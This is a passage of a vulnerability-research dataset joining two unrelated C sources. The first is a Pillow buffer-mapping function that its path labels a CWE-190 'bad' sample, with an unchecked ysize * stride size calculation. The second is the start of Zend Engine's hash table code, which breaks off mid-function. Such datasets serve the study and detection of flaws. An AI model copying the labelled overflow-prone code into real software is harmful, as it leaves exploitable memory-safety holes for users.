PyObject* target;
Py_buffer view;
char* mode;
char* codec;
PyObject* bbox;
Py_ssize_t offset;
int xsize, ysize;
int stride;
int ystep;
if (!PyArg_ParseTuple(args, "O(ii)sOn(sii)", &target, &xsize, &ysize,
&codec, &bbox, &offset, &mode, &stride, &ystep))
return NULL;
if (!PyImaging_CheckBuffer(target)) {
PyErr_SetString(PyExc_TypeError, "expected string or buffer");
return NULL;
}
if (stride <= 0) {
if (!strcmp(mode, "L") || !strcmp(mode, "P"))
stride = xsize;
else if (!strncmp(mode, "I;16", 4))
stride = xsize * 2;
else
stride = xsize * 4;
}
size = (Py_ssize_t) ysize * stride;
/* check buffer size */
if (PyImaging_GetBuffer(target, &view) < 0)
return NULL;
if (view.len < 0) {
PyErr_SetString(PyExc_ValueError, "buffer has negative size");
return NULL;
}
if (offset + size > view.len) {
PyErr_SetString(PyExc_ValueError, "buffer is not large enough");
return NULL;
}
im = ImagingNewPrologueSubtype(
mode, xsize, ysize, sizeof(ImagingBufferInstance)
);
if (!im)
return NULL;
/* setup file pointers */
if (ystep > 0)
for (y = 0; y < ysize; y++)
im->image[y] = (char*)view.buf + offset + y * stride;
else
for (y = 0; y < ysize; y++)
im->image[ysize-y-1] = (char*)view.buf + offset + y * stride;
im->destroy = mapping_destroy_buffer;
Py_INCREF(target);
((ImagingBufferInstance*) im)->target = target;
((ImagingBufferInstance*) im)->view = view;
if (!ImagingNewEpilogue(im))
return NULL;
return PyImagingNew(im);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5395_2 |
crossvul-cpp_data_good_3089_0 | /*
+----------------------------------------------------------------------+
| Zend Engine |
+----------------------------------------------------------------------+
| Copyright (c) 1998-2016 Zend Technologies Ltd. (http://www.zend.com) |
+----------------------------------------------------------------------+
| This source file is subject to version 2.00 of the Zend license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.zend.com/license/2_00.txt. |
| If you did not receive a copy of the Zend license and are unable to |
| obtain it through the world-wide-web, please send a note to |
| license@zend.com so we can mail you a copy immediately. |
+----------------------------------------------------------------------+
| Authors: Andi Gutmans <andi@zend.com> |
| Zeev Suraski <zeev@zend.com> |
| Dmitry Stogov <dmitry@zend.com> |
+----------------------------------------------------------------------+
*/
/* $Id$ */
#include "zend.h"
#include "zend_globals.h"
#include "zend_variables.h"
#define HT_DEBUG 0
#if HT_DEBUG
# define HT_ASSERT(c) ZEND_ASSERT(c)
#else
# define HT_ASSERT(c)
#endif
#define HT_POISONED_PTR ((HashTable *) (intptr_t) -1)
#if ZEND_DEBUG
/*
#define HASH_MASK_CONSISTENCY 0xc0
*/
#define HT_OK 0x00
#define HT_IS_DESTROYING 0x40
#define HT_DESTROYED 0x80
#define HT_CLEANING 0xc0
static void _zend_is_inconsistent(const HashTable *ht, const char *file, int line)
{
if ((ht->u.flags & HASH_MASK_CONSISTENCY) == HT_OK) {
return;
}
switch ((ht->u.flags & HASH_MASK_CONSISTENCY)) {
case HT_IS_DESTROYING:
zend_output_debug_string(1, "%s(%d) : ht=%p is being destroyed", file, line, ht);
break;
case HT_DESTROYED:
zend_output_debug_string(1, "%s(%d) : ht=%p is already destroyed", file, line, ht);
break;
case HT_CLEANING:
zend_output_debug_string(1, "%s(%d) : ht=%p is being cleaned", file, line, ht);
break;
default:
zend_output_debug_string(1, "%s(%d) : ht=%p is inconsistent", file, line, ht);
break;
}
zend_bailout();
}
#define IS_CONSISTENT(a) _zend_is_inconsistent(a, __FILE__, __LINE__);
#define SET_INCONSISTENT(n) do { \
(ht)->u.flags |= n; \
} while (0)
#else
#define IS_CONSISTENT(a)
#define SET_INCONSISTENT(n)
#endif
#define HASH_PROTECT_RECURSION(ht) \
if ((ht)->u.flags & HASH_FLAG_APPLY_PROTECTION) { \
if (((ht)->u.flags & ZEND_HASH_APPLY_COUNT_MASK) >= (3 << 8)) { \
zend_error_noreturn(E_ERROR, "Nesting level too deep - recursive dependency?");\
} \
ZEND_HASH_INC_APPLY_COUNT(ht); \
}
#define HASH_UNPROTECT_RECURSION(ht) \
if ((ht)->u.flags & HASH_FLAG_APPLY_PROTECTION) { \
ZEND_HASH_DEC_APPLY_COUNT(ht); \
}
#define ZEND_HASH_IF_FULL_DO_RESIZE(ht) \
if ((ht)->nNumUsed >= (ht)->nTableSize) { \
zend_hash_do_resize(ht); \
}
static void ZEND_FASTCALL zend_hash_do_resize(HashTable *ht);
static uint32_t zend_always_inline zend_hash_check_size(uint32_t nSize)
{
#if defined(ZEND_WIN32)
unsigned long index;
#endif
/* Use big enough power of 2 */
/* size should be between HT_MIN_SIZE and HT_MAX_SIZE */
if (nSize < HT_MIN_SIZE) {
nSize = HT_MIN_SIZE;
} else if (UNEXPECTED(nSize >= HT_MAX_SIZE)) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", nSize, sizeof(Bucket), sizeof(Bucket));
}
#if defined(ZEND_WIN32)
if (BitScanReverse(&index, nSize - 1)) {
return 0x2 << ((31 - index) ^ 0x1f);
} else {
/* nSize is ensured to be in the valid range, fall back to it
rather than using an undefined bis scan result. */
return nSize;
}
#elif (defined(__GNUC__) || __has_builtin(__builtin_clz)) && defined(PHP_HAVE_BUILTIN_CLZ)
return 0x2 << (__builtin_clz(nSize - 1) ^ 0x1f);
#else
nSize -= 1;
nSize |= (nSize >> 1);
nSize |= (nSize >> 2);
nSize |= (nSize >> 4);
nSize |= (nSize >> 8);
nSize |= (nSize >> 16);
return nSize + 1;
#endif
}
static void zend_always_inline zend_hash_real_init_ex(HashTable *ht, int packed)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
ZEND_ASSERT(!((ht)->u.flags & HASH_FLAG_INITIALIZED));
if (packed) {
HT_SET_DATA_ADDR(ht, pemalloc(HT_SIZE(ht), (ht)->u.flags & HASH_FLAG_PERSISTENT));
(ht)->u.flags |= HASH_FLAG_INITIALIZED | HASH_FLAG_PACKED;
HT_HASH_RESET_PACKED(ht);
} else {
(ht)->nTableMask = -(ht)->nTableSize;
HT_SET_DATA_ADDR(ht, pemalloc(HT_SIZE(ht), (ht)->u.flags & HASH_FLAG_PERSISTENT));
(ht)->u.flags |= HASH_FLAG_INITIALIZED;
if (EXPECTED(ht->nTableMask == -8)) {
Bucket *arData = ht->arData;
HT_HASH_EX(arData, -8) = -1;
HT_HASH_EX(arData, -7) = -1;
HT_HASH_EX(arData, -6) = -1;
HT_HASH_EX(arData, -5) = -1;
HT_HASH_EX(arData, -4) = -1;
HT_HASH_EX(arData, -3) = -1;
HT_HASH_EX(arData, -2) = -1;
HT_HASH_EX(arData, -1) = -1;
} else {
HT_HASH_RESET(ht);
}
}
}
static void zend_always_inline zend_hash_check_init(HashTable *ht, int packed)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (UNEXPECTED(!((ht)->u.flags & HASH_FLAG_INITIALIZED))) {
zend_hash_real_init_ex(ht, packed);
}
}
#define CHECK_INIT(ht, packed) \
zend_hash_check_init(ht, packed)
static const uint32_t uninitialized_bucket[-HT_MIN_MASK] =
{HT_INVALID_IDX, HT_INVALID_IDX};
ZEND_API void ZEND_FASTCALL _zend_hash_init(HashTable *ht, uint32_t nSize, dtor_func_t pDestructor, zend_bool persistent ZEND_FILE_LINE_DC)
{
GC_REFCOUNT(ht) = 1;
GC_TYPE_INFO(ht) = IS_ARRAY;
ht->u.flags = (persistent ? HASH_FLAG_PERSISTENT : 0) | HASH_FLAG_APPLY_PROTECTION | HASH_FLAG_STATIC_KEYS;
ht->nTableMask = HT_MIN_MASK;
HT_SET_DATA_ADDR(ht, &uninitialized_bucket);
ht->nNumUsed = 0;
ht->nNumOfElements = 0;
ht->nInternalPointer = HT_INVALID_IDX;
ht->nNextFreeElement = 0;
ht->pDestructor = pDestructor;
ht->nTableSize = zend_hash_check_size(nSize);
}
static void ZEND_FASTCALL zend_hash_packed_grow(HashTable *ht)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nTableSize >= HT_MAX_SIZE) {
zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", ht->nTableSize * 2, sizeof(Bucket), sizeof(Bucket));
}
HANDLE_BLOCK_INTERRUPTIONS();
ht->nTableSize += ht->nTableSize;
HT_SET_DATA_ADDR(ht, perealloc2(HT_GET_DATA_ADDR(ht), HT_SIZE(ht), HT_USED_SIZE(ht), ht->u.flags & HASH_FLAG_PERSISTENT));
HANDLE_UNBLOCK_INTERRUPTIONS();
}
ZEND_API void ZEND_FASTCALL zend_hash_real_init(HashTable *ht, zend_bool packed)
{
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
zend_hash_real_init_ex(ht, packed);
}
ZEND_API void ZEND_FASTCALL zend_hash_packed_to_hash(HashTable *ht)
{
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HANDLE_BLOCK_INTERRUPTIONS();
ht->u.flags &= ~HASH_FLAG_PACKED;
new_data = pemalloc(HT_SIZE_EX(ht->nTableSize, -ht->nTableSize), (ht)->u.flags & HASH_FLAG_PERSISTENT);
ht->nTableMask = -ht->nTableSize;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, (ht)->u.flags & HASH_FLAG_PERSISTENT);
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
}
ZEND_API void ZEND_FASTCALL zend_hash_to_packed(HashTable *ht)
{
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HANDLE_BLOCK_INTERRUPTIONS();
new_data = pemalloc(HT_SIZE_EX(ht->nTableSize, HT_MIN_MASK), (ht)->u.flags & HASH_FLAG_PERSISTENT);
ht->u.flags |= HASH_FLAG_PACKED | HASH_FLAG_STATIC_KEYS;
ht->nTableMask = HT_MIN_MASK;
HT_SET_DATA_ADDR(ht, new_data);
HT_HASH_RESET_PACKED(ht);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, (ht)->u.flags & HASH_FLAG_PERSISTENT);
HANDLE_UNBLOCK_INTERRUPTIONS();
}
ZEND_API void ZEND_FASTCALL _zend_hash_init_ex(HashTable *ht, uint32_t nSize, dtor_func_t pDestructor, zend_bool persistent, zend_bool bApplyProtection ZEND_FILE_LINE_DC)
{
_zend_hash_init(ht, nSize, pDestructor, persistent ZEND_FILE_LINE_RELAY_CC);
if (!bApplyProtection) {
ht->u.flags &= ~HASH_FLAG_APPLY_PROTECTION;
}
}
ZEND_API void ZEND_FASTCALL zend_hash_extend(HashTable *ht, uint32_t nSize, zend_bool packed)
{
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (nSize == 0) return;
if (UNEXPECTED(!((ht)->u.flags & HASH_FLAG_INITIALIZED))) {
if (nSize > ht->nTableSize) {
ht->nTableSize = zend_hash_check_size(nSize);
}
zend_hash_check_init(ht, packed);
} else {
if (packed) {
ZEND_ASSERT(ht->u.flags & HASH_FLAG_PACKED);
if (nSize > ht->nTableSize) {
HANDLE_BLOCK_INTERRUPTIONS();
ht->nTableSize = zend_hash_check_size(nSize);
HT_SET_DATA_ADDR(ht, perealloc2(HT_GET_DATA_ADDR(ht), HT_SIZE(ht), HT_USED_SIZE(ht), ht->u.flags & HASH_FLAG_PERSISTENT));
HANDLE_UNBLOCK_INTERRUPTIONS();
}
} else {
ZEND_ASSERT(!(ht->u.flags & HASH_FLAG_PACKED));
if (nSize > ht->nTableSize) {
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
nSize = zend_hash_check_size(nSize);
HANDLE_BLOCK_INTERRUPTIONS();
new_data = pemalloc(HT_SIZE_EX(nSize, -nSize), ht->u.flags & HASH_FLAG_PERSISTENT);
ht->nTableSize = nSize;
ht->nTableMask = -ht->nTableSize;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, ht->u.flags & HASH_FLAG_PERSISTENT);
zend_hash_rehash(ht);
HANDLE_UNBLOCK_INTERRUPTIONS();
}
}
}
}
static uint32_t zend_array_recalc_elements(HashTable *ht)
{
zval *val;
uint32_t num = ht->nNumOfElements;
ZEND_HASH_FOREACH_VAL(ht, val) {
if (Z_TYPE_P(val) == IS_UNDEF) continue;
if (Z_TYPE_P(val) == IS_INDIRECT) {
if (UNEXPECTED(Z_TYPE_P(Z_INDIRECT_P(val)) == IS_UNDEF)) {
num--;
}
}
} ZEND_HASH_FOREACH_END();
return num;
}
/* }}} */
ZEND_API uint32_t zend_array_count(HashTable *ht)
{
uint32_t num;
if (UNEXPECTED(ht->u.v.flags & HASH_FLAG_HAS_EMPTY_IND)) {
num = zend_array_recalc_elements(ht);
if (UNEXPECTED(ht->nNumOfElements == num)) {
ht->u.v.flags &= ~HASH_FLAG_HAS_EMPTY_IND;
}
} else if (UNEXPECTED(ht == &EG(symbol_table))) {
num = zend_array_recalc_elements(ht);
} else {
num = zend_hash_num_elements(ht);
}
return num;
}
/* }}} */
ZEND_API void ZEND_FASTCALL zend_hash_set_apply_protection(HashTable *ht, zend_bool bApplyProtection)
{
if (bApplyProtection) {
ht->u.flags |= HASH_FLAG_APPLY_PROTECTION;
} else {
ht->u.flags &= ~HASH_FLAG_APPLY_PROTECTION;
}
}
ZEND_API uint32_t ZEND_FASTCALL zend_hash_iterator_add(HashTable *ht, HashPosition pos)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_count);
uint32_t idx;
if (EXPECTED(ht->u.v.nIteratorsCount != 255)) {
ht->u.v.nIteratorsCount++;
}
while (iter != end) {
if (iter->ht == NULL) {
iter->ht = ht;
iter->pos = pos;
idx = iter - EG(ht_iterators);
if (idx + 1 > EG(ht_iterators_used)) {
EG(ht_iterators_used) = idx + 1;
}
return idx;
}
iter++;
}
if (EG(ht_iterators) == EG(ht_iterators_slots)) {
EG(ht_iterators) = emalloc(sizeof(HashTableIterator) * (EG(ht_iterators_count) + 8));
memcpy(EG(ht_iterators), EG(ht_iterators_slots), sizeof(HashTableIterator) * EG(ht_iterators_count));
} else {
EG(ht_iterators) = erealloc(EG(ht_iterators), sizeof(HashTableIterator) * (EG(ht_iterators_count) + 8));
}
iter = EG(ht_iterators) + EG(ht_iterators_count);
EG(ht_iterators_count) += 8;
iter->ht = ht;
iter->pos = pos;
memset(iter + 1, 0, sizeof(HashTableIterator) * 7);
idx = iter - EG(ht_iterators);
EG(ht_iterators_used) = idx + 1;
return idx;
}
ZEND_API HashPosition ZEND_FASTCALL zend_hash_iterator_pos(uint32_t idx, HashTable *ht)
{
HashTableIterator *iter = EG(ht_iterators) + idx;
ZEND_ASSERT(idx != (uint32_t)-1);
if (iter->pos == HT_INVALID_IDX) {
return HT_INVALID_IDX;
} else if (UNEXPECTED(iter->ht != ht)) {
if (EXPECTED(iter->ht) && EXPECTED(iter->ht != HT_POISONED_PTR)
&& EXPECTED(iter->ht->u.v.nIteratorsCount != 255)) {
iter->ht->u.v.nIteratorsCount--;
}
if (EXPECTED(ht->u.v.nIteratorsCount != 255)) {
ht->u.v.nIteratorsCount++;
}
iter->ht = ht;
iter->pos = ht->nInternalPointer;
}
return iter->pos;
}
ZEND_API HashPosition ZEND_FASTCALL zend_hash_iterator_pos_ex(uint32_t idx, zval *array)
{
HashTable *ht = Z_ARRVAL_P(array);
HashTableIterator *iter = EG(ht_iterators) + idx;
ZEND_ASSERT(idx != (uint32_t)-1);
if (iter->pos == HT_INVALID_IDX) {
return HT_INVALID_IDX;
} else if (UNEXPECTED(iter->ht != ht)) {
if (EXPECTED(iter->ht) && EXPECTED(iter->ht != HT_POISONED_PTR)
&& EXPECTED(iter->ht->u.v.nIteratorsCount != 255)) {
iter->ht->u.v.nIteratorsCount--;
}
SEPARATE_ARRAY(array);
ht = Z_ARRVAL_P(array);
if (EXPECTED(ht->u.v.nIteratorsCount != 255)) {
ht->u.v.nIteratorsCount++;
}
iter->ht = ht;
iter->pos = ht->nInternalPointer;
}
return iter->pos;
}
ZEND_API void ZEND_FASTCALL zend_hash_iterator_del(uint32_t idx)
{
HashTableIterator *iter = EG(ht_iterators) + idx;
ZEND_ASSERT(idx != (uint32_t)-1);
if (EXPECTED(iter->ht) && EXPECTED(iter->ht != HT_POISONED_PTR)
&& EXPECTED(iter->ht->u.v.nIteratorsCount != 255)) {
iter->ht->u.v.nIteratorsCount--;
}
iter->ht = NULL;
if (idx == EG(ht_iterators_used) - 1) {
while (idx > 0 && EG(ht_iterators)[idx - 1].ht == NULL) {
idx--;
}
EG(ht_iterators_used) = idx;
}
}
static zend_never_inline void ZEND_FASTCALL _zend_hash_iterators_remove(HashTable *ht)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_used);
while (iter != end) {
if (iter->ht == ht) {
iter->ht = HT_POISONED_PTR;
}
iter++;
}
}
static zend_always_inline void zend_hash_iterators_remove(HashTable *ht)
{
if (UNEXPECTED(ht->u.v.nIteratorsCount)) {
_zend_hash_iterators_remove(ht);
}
}
ZEND_API HashPosition ZEND_FASTCALL zend_hash_iterators_lower_pos(HashTable *ht, HashPosition start)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_used);
HashPosition res = HT_INVALID_IDX;
while (iter != end) {
if (iter->ht == ht) {
if (iter->pos >= start && iter->pos < res) {
res = iter->pos;
}
}
iter++;
}
return res;
}
ZEND_API void ZEND_FASTCALL _zend_hash_iterators_update(HashTable *ht, HashPosition from, HashPosition to)
{
HashTableIterator *iter = EG(ht_iterators);
HashTableIterator *end = iter + EG(ht_iterators_used);
while (iter != end) {
if (iter->ht == ht && iter->pos == from) {
iter->pos = to;
}
iter++;
}
}
static zend_always_inline Bucket *zend_hash_find_bucket(const HashTable *ht, zend_string *key)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p, *arData;
h = zend_string_hash_val(key);
arData = ht->arData;
nIndex = h | ht->nTableMask;
idx = HT_HASH_EX(arData, nIndex);
while (EXPECTED(idx != HT_INVALID_IDX)) {
p = HT_HASH_TO_BUCKET_EX(arData, idx);
if (EXPECTED(p->key == key)) { /* check for the same interned string */
return p;
} else if (EXPECTED(p->h == h) &&
EXPECTED(p->key) &&
EXPECTED(ZSTR_LEN(p->key) == ZSTR_LEN(key)) &&
EXPECTED(memcmp(ZSTR_VAL(p->key), ZSTR_VAL(key), ZSTR_LEN(key)) == 0)) {
return p;
}
idx = Z_NEXT(p->val);
}
return NULL;
}
static zend_always_inline Bucket *zend_hash_str_find_bucket(const HashTable *ht, const char *str, size_t len, zend_ulong h)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p, *arData;
arData = ht->arData;
nIndex = h | ht->nTableMask;
idx = HT_HASH_EX(arData, nIndex);
while (idx != HT_INVALID_IDX) {
ZEND_ASSERT(idx < HT_IDX_TO_HASH(ht->nTableSize));
p = HT_HASH_TO_BUCKET_EX(arData, idx);
if ((p->h == h)
&& p->key
&& (ZSTR_LEN(p->key) == len)
&& !memcmp(ZSTR_VAL(p->key), str, len)) {
return p;
}
idx = Z_NEXT(p->val);
}
return NULL;
}
static zend_always_inline Bucket *zend_hash_index_find_bucket(const HashTable *ht, zend_ulong h)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p, *arData;
arData = ht->arData;
nIndex = h | ht->nTableMask;
idx = HT_HASH_EX(arData, nIndex);
while (idx != HT_INVALID_IDX) {
ZEND_ASSERT(idx < HT_IDX_TO_HASH(ht->nTableSize));
p = HT_HASH_TO_BUCKET_EX(arData, idx);
if (p->h == h && !p->key) {
return p;
}
idx = Z_NEXT(p->val);
}
return NULL;
}
static zend_always_inline zval *_zend_hash_add_or_update_i(HashTable *ht, zend_string *key, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
zend_ulong h;
uint32_t nIndex;
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (UNEXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
CHECK_INIT(ht, 0);
goto add_to_hash;
} else if (ht->u.flags & HASH_FLAG_PACKED) {
zend_hash_packed_to_hash(ht);
} else if ((flag & HASH_ADD_NEW) == 0) {
p = zend_hash_find_bucket(ht, key);
if (p) {
zval *data;
if (flag & HASH_ADD) {
if (!(flag & HASH_UPDATE_INDIRECT)) {
return NULL;
}
ZEND_ASSERT(&p->val != pData);
data = &p->val;
if (Z_TYPE_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
if (Z_TYPE_P(data) != IS_UNDEF) {
return NULL;
}
} else {
return NULL;
}
} else {
ZEND_ASSERT(&p->val != pData);
data = &p->val;
if ((flag & HASH_UPDATE_INDIRECT) && Z_TYPE_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
}
}
HANDLE_BLOCK_INTERRUPTIONS();
if (ht->pDestructor) {
ht->pDestructor(data);
}
ZVAL_COPY_VALUE(data, pData);
HANDLE_UNBLOCK_INTERRUPTIONS();
return data;
}
}
ZEND_HASH_IF_FULL_DO_RESIZE(ht); /* If the Hash table is full, resize it */
add_to_hash:
HANDLE_BLOCK_INTERRUPTIONS();
idx = ht->nNumUsed++;
ht->nNumOfElements++;
if (ht->nInternalPointer == HT_INVALID_IDX) {
ht->nInternalPointer = idx;
}
zend_hash_iterators_update(ht, HT_INVALID_IDX, idx);
p = ht->arData + idx;
p->key = key;
if (!ZSTR_IS_INTERNED(key)) {
zend_string_addref(key);
ht->u.flags &= ~HASH_FLAG_STATIC_KEYS;
zend_string_hash_val(key);
}
p->h = h = ZSTR_H(key);
ZVAL_COPY_VALUE(&p->val, pData);
nIndex = h | ht->nTableMask;
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
HT_HASH(ht, nIndex) = HT_IDX_TO_HASH(idx);
HANDLE_UNBLOCK_INTERRUPTIONS();
return &p->val;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_add_or_update(HashTable *ht, zend_string *key, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, flag ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_add(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_update(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_update_ind(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_add_new(HashTable *ht, zend_string *key, zval *pData ZEND_FILE_LINE_DC)
{
return _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD_NEW ZEND_FILE_LINE_RELAY_CC);
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_add_or_update(HashTable *ht, const char *str, size_t len, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, flag ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_update(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_update_ind(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_UPDATE | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_add(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD ZEND_FILE_LINE_RELAY_CC);
zend_string_release(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL _zend_hash_str_add_new(HashTable *ht, const char *str, size_t len, zval *pData ZEND_FILE_LINE_DC)
{
zend_string *key = zend_string_init(str, len, ht->u.flags & HASH_FLAG_PERSISTENT);
zval *ret = _zend_hash_add_or_update_i(ht, key, pData, HASH_ADD_NEW ZEND_FILE_LINE_RELAY_CC);
zend_string_delref(key);
return ret;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_index_add_empty_element(HashTable *ht, zend_ulong h)
{
zval dummy;
ZVAL_NULL(&dummy);
return zend_hash_index_add(ht, h, &dummy);
}
ZEND_API zval* ZEND_FASTCALL zend_hash_add_empty_element(HashTable *ht, zend_string *key)
{
zval dummy;
ZVAL_NULL(&dummy);
return zend_hash_add(ht, key, &dummy);
}
ZEND_API zval* ZEND_FASTCALL zend_hash_str_add_empty_element(HashTable *ht, const char *str, size_t len)
{
zval dummy;
ZVAL_NULL(&dummy);
return zend_hash_str_add(ht, str, len, &dummy);
}
static zend_always_inline zval *_zend_hash_index_add_or_update_i(HashTable *ht, zend_ulong h, zval *pData, uint32_t flag ZEND_FILE_LINE_DC)
{
uint32_t nIndex;
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (UNEXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
CHECK_INIT(ht, h < ht->nTableSize);
if (h < ht->nTableSize) {
p = ht->arData + h;
goto add_to_packed;
}
goto add_to_hash;
} else if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
p = ht->arData + h;
if (Z_TYPE(p->val) != IS_UNDEF) {
if (flag & HASH_ADD) {
return NULL;
}
if (ht->pDestructor) {
ht->pDestructor(&p->val);
}
ZVAL_COPY_VALUE(&p->val, pData);
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
return &p->val;
} else { /* we have to keep the order :( */
goto convert_to_hash;
}
} else if (EXPECTED(h < ht->nTableSize)) {
p = ht->arData + h;
} else if ((h >> 1) < ht->nTableSize &&
(ht->nTableSize >> 1) < ht->nNumOfElements) {
zend_hash_packed_grow(ht);
p = ht->arData + h;
} else {
goto convert_to_hash;
}
add_to_packed:
HANDLE_BLOCK_INTERRUPTIONS();
/* incremental initialization of empty Buckets */
if ((flag & (HASH_ADD_NEW|HASH_ADD_NEXT)) == (HASH_ADD_NEW|HASH_ADD_NEXT)) {
ht->nNumUsed = h + 1;
} else if (h >= ht->nNumUsed) {
if (h > ht->nNumUsed) {
Bucket *q = ht->arData + ht->nNumUsed;
while (q != p) {
ZVAL_UNDEF(&q->val);
q++;
}
}
ht->nNumUsed = h + 1;
}
ht->nNumOfElements++;
if (ht->nInternalPointer == HT_INVALID_IDX) {
ht->nInternalPointer = h;
}
zend_hash_iterators_update(ht, HT_INVALID_IDX, h);
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
p->h = h;
p->key = NULL;
ZVAL_COPY_VALUE(&p->val, pData);
HANDLE_UNBLOCK_INTERRUPTIONS();
return &p->val;
convert_to_hash:
zend_hash_packed_to_hash(ht);
} else if ((flag & HASH_ADD_NEW) == 0) {
p = zend_hash_index_find_bucket(ht, h);
if (p) {
if (flag & HASH_ADD) {
return NULL;
}
ZEND_ASSERT(&p->val != pData);
HANDLE_BLOCK_INTERRUPTIONS();
if (ht->pDestructor) {
ht->pDestructor(&p->val);
}
ZVAL_COPY_VALUE(&p->val, pData);
HANDLE_UNBLOCK_INTERRUPTIONS();
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
return &p->val;
}
}
ZEND_HASH_IF_FULL_DO_RESIZE(ht); /* If the Hash table is full, resize it */
add_to_hash:
HANDLE_BLOCK_INTERRUPTIONS();
idx = ht->nNumUsed++;
ht->nNumOfElements++;
if (ht->nInternalPointer == HT_INVALID_IDX) {
ht->nInternalPointer = idx;
}
zend_hash_iterators_update(ht, HT_INVALID_IDX, idx);
if ((zend_long)h >= (zend_long)ht->nNextFreeElement) {
ht->nNextFreeElement = h < ZEND_LONG_MAX ? h + 1 : ZEND_LONG_MAX;
}
p = ht->arData + idx;
p->h = h;
p->key = NULL;
nIndex = h | ht->nTableMask;
ZVAL_COPY_VALUE(&p->val, pData);
Z_NEXT(p->val) = HT_HASH(ht, nIndex);
